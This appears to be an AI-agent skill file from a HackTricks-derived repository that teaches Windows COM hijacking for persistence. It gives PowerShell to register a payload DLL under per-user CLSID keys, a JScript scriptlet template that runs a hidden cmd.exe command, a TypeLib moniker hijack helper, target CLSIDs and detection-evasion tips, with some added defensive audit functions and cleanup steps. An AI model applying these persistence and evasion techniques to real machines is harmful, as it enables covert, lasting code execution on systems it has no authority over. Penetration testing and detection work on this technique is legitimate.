Hacktricks-skills com-hijacking
Windows COM hijacking techniques for authorized penetration testing and security research. Use this skill when the user needs to find hijackable COM components, create COM persistence mechanisms, or analyze COM-based attack vectors on Windows systems. This includes finding non-existent COM CLSIDs via ProcMon, hijacking Task Scheduler COM components, and TypeLib moniker hijacking. Always use only in authorized security testing contexts.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/windows-hardening/windows-local-privilege-escalation/com-hijacking/SKILL.MD

COM Hijacking for Windows Security Testing
This skill provides techniques for identifying and exploiting COM hijacking vulnerabilities on Windows systems. COM hijacking is a powerful persistence mechanism that leverages Windows' Component Object Model registry resolution order.
Understanding COM Hijacking
Windows COM uses a registry resolution order in which HKCU (current user) takes precedence over HKLM (local machine). This means a standard user can hijack COM components by creating entries in their own user registry hive that override system-wide registrations.
Registry Resolution Order
1. HKCU\Software\Classes\CLSID\{CLSID}
2. HKLM\Software\Classes\CLSID\{CLSID}
3. HKCR\CLSID\{CLSID} (merged view of the two above)
Technique 1: Finding Non-Existent COM Components
Use Process Monitor to identify COM components that applications search for but don't exist. These are prime candidates for hijacking.
ProcMon Filter Configuration
Apply these filters in Process Monitor:
- Operation: RegOpenKey
- Result: NAME NOT FOUND
- Path: ends with InprocServer32
This reveals COM CLSIDs that applications attempt to load but fail to find, indicating they could be created for persistence.
Creating a COM Hijack
Once you've identified a target CLSID, create the hijack entry:
```powershell
# Create the CLSID key
New-Item -Path "HKCU:\Software\Classes\CLSID" -Name "{TARGET-CLSID}" -Force
# Create InprocServer32 with your payload path as its (default) value
New-Item -Path "HKCU:\Software\Classes\CLSID\{TARGET-CLSID}" -Name "InprocServer32" -Value "C:\path\to\payload.dll" -Force
# Set the threading model
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{TARGET-CLSID}\InprocServer32" -Name "ThreadingModel" -Value "Both" -Force
```
Important: Be cautious about hijacking COM components that load frequently. This could cause system instability or alert detection systems.
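The same resolution order is what a defender audits to find a hijack that is already in place. The following PowerShell function is an added example, not code from the hacktricks-skills repository or from HackTricks: it walks HKCU\Software\Classes\CLSID and reports per-user registrations that shadow an HKLM entry or whose server path lies outside the Windows and Program Files directories. The function name, the TrustedRoots parameter and the output field names are my own choices; it needs only standard-user rights.

```powershell
# Added audit example (not part of the hacktricks-skills repo): list per-user CLSID
# registrations that shadow a machine-wide one, which is what a COM hijack looks like
# from the defender's side. Runs as a standard user.
function Get-ShadowedComRegistration {
    [CmdletBinding()]
    param(
        # Directories considered normal for COM servers; anything else is flagged (assumed policy).
        [string[]]$TrustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")
    )

    # On 32-bit hosts ProgramFiles(x86) is empty and would yield a bare "\" that matches everything.
    $TrustedRoots = $TrustedRoots | Where-Object { $_.Length -gt 1 }

    $userClsidRoot = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path $userClsidRoot)) {
        return   # no per-user CLSIDs at all, so nothing can be shadowed
    }

    foreach ($key in Get-ChildItem -Path $userClsidRoot -ErrorAction SilentlyContinue) {
        $clsid = $key.PSChildName
        if ($clsid -notmatch '^\{[0-9A-Fa-f-]{36}\}$') { continue }

        # The server path is the (default) value of InprocServer32 (in-proc DLL)
        # or LocalServer32 (out-of-proc EXE).
        $server = $null
        $serverKind = $null
        foreach ($sub in 'InprocServer32', 'LocalServer32') {
            $subPath = Join-Path $key.PSPath $sub
            if (Test-Path $subPath) {
                $server = (Get-ItemProperty -Path $subPath -ErrorAction SilentlyContinue).'(default)'
                $serverKind = $sub
                break
            }
        }
        if (-not $server) { continue }

        # Does a machine-wide registration exist that this per-user key overrides?
        $shadowsMachine = Test-Path "HKLM:\Software\Classes\CLSID\$clsid"

        # Expand %VAR% references and strip quotes before checking the location.
        # LocalServer32 values may carry arguments, so FileExists can be false for those.
        $expanded = [Environment]::ExpandEnvironmentVariables($server).Trim('"')
        $inTrustedRoot = $false
        foreach ($root in $TrustedRoots) {
            if ($expanded.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
                $inTrustedRoot = $true
                break
            }
        }

        [pscustomobject]@{
            Clsid          = $clsid
            ServerKind     = $serverKind
            ServerPath     = $server
            ShadowsHKLM    = $shadowsMachine
            OutsideTrusted = -not $inTrustedRoot
            FileExists     = Test-Path -LiteralPath $expanded -PathType Leaf
        }
    }
}

# Anything that shadows HKLM or points outside the trusted roots deserves a closer look.
Get-ShadowedComRegistration |
    Where-Object { $_.ShadowsHKLM -or $_.OutsideTrusted } |
    Format-Table -AutoSize
```

Expect some benign hits: per-user installers such as those that live under %LOCALAPPDATA% legitimately register COM servers in HKCU, so the OutsideTrusted flag is a triage aid, not a verdict. A ShadowsHKLM hit whose server path differs from the HKLM one is the strongest signal, because there is rarely a legitimate reason for a user hive to override a machine-wide CLSID.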
Technique 2: Task Scheduler COM Hijacking
Windows Task Scheduler uses COM objects for custom triggers. These are predictable and often run at user logon, making them excellent persistence targets.
Finding Hijackable Task Scheduler COM Components
Use the helper script to enumerate Task Scheduler COM components:
. scripts/find-task-scheduler-com.ps1
This script identifies tasks that:
- Use COM ClassId actions
- Have enabled triggers
- Run under the Users group (S-1-5-32-545)
Analyzing Results
For each identified task, check if the CLSID exists in HKCU:
```powershell
# Check if CLSID exists in HKCU (it shouldn't for a good target)
Get-Item -Path "HKCU:\Software\Classes\CLSID\{CLSID}" -ErrorAction SilentlyContinue
# Check if it exists in HKLM (it should)
Get-Item -Path "HKLM:\Software\Classes\CLSID\{CLSID}" -ErrorAction SilentlyContinue
```
If the CLSID exists in HKLM but not HKCU, it's a viable hijacking target.
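From the defender's side the question is the inverse: which scheduled tasks use a COM handler, and does that handler's CLSID currently resolve in HKCU for the logged-on user? The following function is an added example, not the repository's find-task-scheduler-com.ps1 helper: it enumerates tasks with Get-ScheduledTask, picks out ComHandler actions by their ClassId property, and reports where each CLSID resolves under the HKCU-before-HKLM order. The function and output field names are my own.

```powershell
# Added detection example (not part of the hacktricks-skills repo): report, for every scheduled
# task whose action is a COM handler, whether the handler CLSID resolves in HKCU (what a Task
# Scheduler COM hijack looks like), in HKLM (normal), or nowhere (no server registered at all).
function Get-ComHandlerTaskResolution {
    [CmdletBinding()]
    param()

    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            # Only ComHandler actions carry a ClassId; Exec actions carry Execute/Arguments instead.
            if (-not ($action.PSObject.Properties.Name -contains 'ClassId')) { continue }
            $clsid = $action.ClassId
            if (-not $clsid) { continue }

            $userKey    = "HKCU:\Software\Classes\CLSID\$clsid"
            $machineKey = "HKLM:\Software\Classes\CLSID\$clsid"
            $inUser     = Test-Path $userKey
            $inMachine  = Test-Path $machineKey

            # The per-user key wins whenever it exists, so read the server path from there first.
            $winningKey = if ($inUser) { $userKey } elseif ($inMachine) { $machineKey } else { $null }
            $server = $null
            if ($winningKey) {
                $server = (Get-ItemProperty -Path "$winningKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
            }

            $resolvesIn = if ($inUser) { 'HKCU (possible hijack)' }
                          elseif ($inMachine) { 'HKLM' }
                          else { 'missing' }

            [pscustomobject]@{
                TaskPath   = $task.TaskPath
                TaskName   = $task.TaskName
                State      = $task.State
                UserId     = $task.Principal.UserId
                GroupId    = $task.Principal.GroupId
                ClassId    = $clsid
                ResolvesIn = $resolvesIn
                ServerPath = $server
            }
        }
    }
}

# Surface only the tasks whose handler is served from the user hive.
Get-ComHandlerTaskResolution |
    Where-Object { $_.ResolvesIn -like 'HKCU*' } |
    Format-Table TaskPath, TaskName, ClassId, ServerPath -AutoSize
```

Run this in the context of each interactive user you care about, since the HKCU check only sees the hive of the account executing the script; a hijack planted by another user on a shared host is invisible from a different session. Tasks in the 'missing' state are worth inventorying too, because that is exactly the precondition the enumeration above looks for.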
Technique 3: COM TypeLib Hijacking
Type Libraries (TypeLib) define COM interfaces and are loaded via LoadTypeLib(). By replacing the TypeLib path with a script moniker, you can execute arbitrary code when the TypeLib is resolved.
Finding Target TypeLibs
Identify high-frequency CLSIDs and their associated TypeLibs:
```powershell
# Example: Microsoft Web Browser control
$clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}'
$libid = (Get-ItemProperty -Path "Registry::HKCR\CLSID\$clsid\TypeLib").'(default)'
$ver = (Get-ChildItem "Registry::HKCR\TypeLib\$libid" | Select-Object -First 1).PSChildName
Write-Host "CLSID=$clsid LIBID=$libid VER=$ver"
```
Creating a TypeLib Hijack
Use the helper script to create a TypeLib hijack:
. scripts/create-typelib-hijack.ps1 -LibId "{LIBID}" -Version "{VERSION}" -ScriptPath "C:\path\to\payload.sct"
Scriptlet Format
Create a minimal JScript scriptlet (.sct file):

```xml
<?xml version="1.0"?>
<scriptlet>
  <registration progid="UpdateSrv" classid="{F0001111-0000-0000-0000-0000F00D0001}" description="UpdateSrv"/>
  <script language="JScript">
    <![CDATA[
      try {
        var sh = new ActiveXObject('WScript.Shell');
        // Execute your payload
        var cmd = 'cmd.exe /K your-command-here';
        sh.Run(cmd, 0, false);
      } catch(e) {}
    ]]>
  </script>
</scriptlet>
```
Triggering
The scriptlet executes when:
- Internet Explorer opens
- Applications embedding WebBrowser control load
- Explorer.exe performs certain operations
- Any application loads the hijacked TypeLib
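Because a TypeLib hijack has to create per-user keys under HKCU\Software\Classes\TypeLib, those keys are a natural place for a defender to look. The following function is an added example, not the repository's create-typelib-hijack.ps1 helper or a HackTricks script: it walks every LIBID, version, LCID and win32/win64 subkey in the user hive and flags path values that are monikers (such as script:) rather than files, that point to a file which does not exist, or that shadow a machine-wide TypeLib of the same LIBID and version. The function name, the output fields and the moniker heuristic are my own.

```powershell
# Added detection example (not part of the hacktricks-skills repo): audit per-user TypeLib
# registrations for moniker paths and for entries that shadow HKLM. Runs as a standard user.
function Get-SuspiciousUserTypeLib {
    [CmdletBinding()]
    param()

    $root = 'HKCU:\Software\Classes\TypeLib'
    if (-not (Test-Path $root)) { return }   # no per-user TypeLibs registered

    foreach ($lib in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
        foreach ($ver in Get-ChildItem -Path $lib.PSPath -ErrorAction SilentlyContinue) {
            # Layout: TypeLib\{LIBID}\<version>\<lcid>\win32|win64, path stored as (default).
            # Sibling keys such as FLAGS and HELPDIR have no win32/win64 child and are skipped.
            foreach ($lcid in Get-ChildItem -Path $ver.PSPath -ErrorAction SilentlyContinue) {
                foreach ($arch in 'win32', 'win64') {
                    $archKey = Join-Path $lcid.PSPath $arch
                    if (-not (Test-Path $archKey)) { continue }
                    $value = (Get-ItemProperty -Path $archKey -ErrorAction SilentlyContinue).'(default)'
                    if (-not $value) { continue }

                    # Heuristic (mine): a moniker has a scheme-like prefix ("script:", etc.) but is not
                    # a drive letter such as "C:\". Environment-variable paths start with "%".
                    $isMoniker = ($value -match '^[A-Za-z]+:') -and ($value -notmatch '^[A-Za-z]:\\')

                    # Real type library paths may carry a "\<resource-id>" suffix; strip it before checking.
                    $file = [Environment]::ExpandEnvironmentVariables(($value -replace '\\\d+$', '')).Trim('"')
                    $fileExists = (-not $isMoniker) -and (Test-Path -LiteralPath $file -PathType Leaf)

                    $shadowsMachine = Test-Path "HKLM:\Software\Classes\TypeLib\$($lib.PSChildName)\$($ver.PSChildName)"

                    [pscustomobject]@{
                        LibId       = $lib.PSChildName
                        Version     = $ver.PSChildName
                        Lcid        = $lcid.PSChildName
                        Arch        = $arch
                        Path        = $value
                        IsMoniker   = $isMoniker
                        FileExists  = $fileExists
                        ShadowsHKLM = $shadowsMachine
                    }
                }
            }
        }
    }
}

# Report anything that is a moniker, points at a missing file, or overrides a machine-wide TypeLib.
Get-SuspiciousUserTypeLib |
    Where-Object { $_.IsMoniker -or (-not $_.FileExists) -or $_.ShadowsHKLM } |
    Format-Table LibId, Version, Arch, Path, IsMoniker, ShadowsHKLM -AutoSize
```

Checking both win32 and win64 matters on 64-bit hosts for the same reason the page later tells the tester to populate both: a 32-bit and a 64-bit process resolve different subkeys, so an audit that reads only one of them can miss half of the picture.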
Cleanup Procedures
Always clean up after testing:
```powershell
# Remove COM hijack
Remove-Item -Recurse -Force "HKCU:\Software\Classes\CLSID\{CLSID}" 2>$null
# Remove TypeLib hijack
Remove-Item -Recurse -Force "HKCU:\Software\Classes\TypeLib\{LIBID}\{VERSION}" 2>$null
# Remove dropped files
Remove-Item -Force "C:\path\to\payload.sct" 2>$null
Remove-Item -Force "C:\path\to\payload.dll" 2>$null
```
Detection Evasion Considerations
- Timing: Avoid hijacking components that load too frequently
- Legitimacy: Use CLSIDs that are commonly present on systems
- Stealth: TypeLib hijacking is less commonly detected than direct COM hijacking
- 64-bit systems: Populate both win32 and win64 subkeys for comprehensive coverage
Common Target CLSIDs
| CLSID | Component | Frequency |
|---|---|---|
| {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B} | Microsoft Web Browser | High |
| | MsCtfMonitor | Medium |
| | Task Scheduler | Medium |
References
- Hijack the TypeLib – New COM persistence technique (CICADA8)
- Check Point Research – ZipLine Campaign
- HackTricks - COM Hijacking
Helper Scripts
- scripts/find-task-scheduler-com.ps1: Enumerate hijackable Task Scheduler COM components
- scripts/create-typelib-hijack.ps1: Create TypeLib moniker hijacks
- scripts/find-com-hijacks.ps1: Parse ProcMon logs for hijackable COM components
- scripts/create-com-hijack.ps1: Create standard COM hijack entries